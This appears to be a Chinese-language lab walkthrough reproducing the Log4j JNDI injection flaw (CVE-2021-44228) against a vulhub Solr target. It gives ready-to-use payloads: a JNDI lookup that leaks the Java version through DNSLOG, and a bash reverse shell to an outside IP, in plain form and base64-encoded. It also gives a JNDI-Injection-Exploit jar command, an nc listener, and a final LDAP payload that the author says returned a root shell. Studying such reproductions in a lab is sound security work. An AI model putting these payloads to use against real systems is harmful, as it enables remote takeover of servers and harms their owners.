目录
一、相关概念
二、漏洞复现
步骤一:执行一下命令启动靶场环境并在浏览器访问!!!
1.启动命令
2.访问网址
步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监视我们注入的效果...
步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
步骤四:开始反弹ShelI准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!
#JDNI项目地址
# 反弹shell
#反弹Shell-base64加密
#命令模板
#最终Payload
步骤五:以上可以看到有三个服务,看到熟悉的rmi和ldap,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听.
#服务器监听(别忘记关闭服务器防火墙)
步骤六:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址.…
步骤七:去另外一个监控终端看看shell有没有弹回来且用 whoami 命令查看权限,发现已经成功获取到root权限了。大功告成!
一、相关概念
Apache Log4j:Apache的开源项目,一个功能强大的日志组件,提供方便的日志记录Apache Log4j2:对Log4j的升级,它比其前身Log4j1.x提供了重大改进,并提供了Logback中可用的许多改进,同时修复了Loqback架构中的一些问题。优秀的Java日志框架;Log4j2 漏洞受影响版本:2.0到2.14.1版本中存在一处JNDI注入漏洞
二、漏洞复现
步骤一:执行一下命令启动靶场环境并在浏览器访问!!!
1.启动命令
systemctl start docker
cd vulhub/log4j/CVE-2021-44228
docker-compose up -d
2.访问网址
步骤二:先在自己搭建的DNSLOG平台上获取一个域名来监视我们注入的效果...
步骤三:可以发现 /solr/admin/cores?action= 这里有个参数可以传,可以按照上面的原理先构造一个请求传过去存在JNDI注入那么Idap服务端会执行我们传上去的payload然后在DNSLOG平台上那里留下记录,我们可以看到留下了访问记录并且前面的参数被执行后给我们回显了java的版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.8ebebc.dnslog.cn}
步骤四:开始反弹ShelI准备 INDI-Injection-Exploit 下载地址并构造PayLoad如下...启动!
#JDNI项目地址
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
# 反弹shell
bash -i >& /dev/tcp/60.205.170.32/7777 0>&1
#反弹Shell-base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMTcwLjMyLzc3NzcgMD4mMQ==#命令模板
java -jar target/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的ypsip」#最终Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC82MC4yMDUuMTcwLjMyLzc3NzcgMD4mMQ==}|{base64,-d}|bash" -A 60.205.170.32
步骤五:以上可以看到有三个服务,看到熟悉的rmi和ldap,实际上这个jar的作用就是帮我们生成了恶意代码类,并且生成了对应的url,然后我们就可以回到刚才的网站去进行JNDI注入..这里在注入之前另启动一个终端开启监听.
#服务器监听(别忘记关闭服务器防火墙)
nc -lvvp 7777
步骤六:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址.…
/solr/admin/cores?action=${jndi:ldap://60.205.170.32:1389/zmwqp0}
步骤七:去另外一个监控终端看看shell有没有弹回来且用 whoami 命令查看权限,发现已经成功获取到root权限了。大功告成!
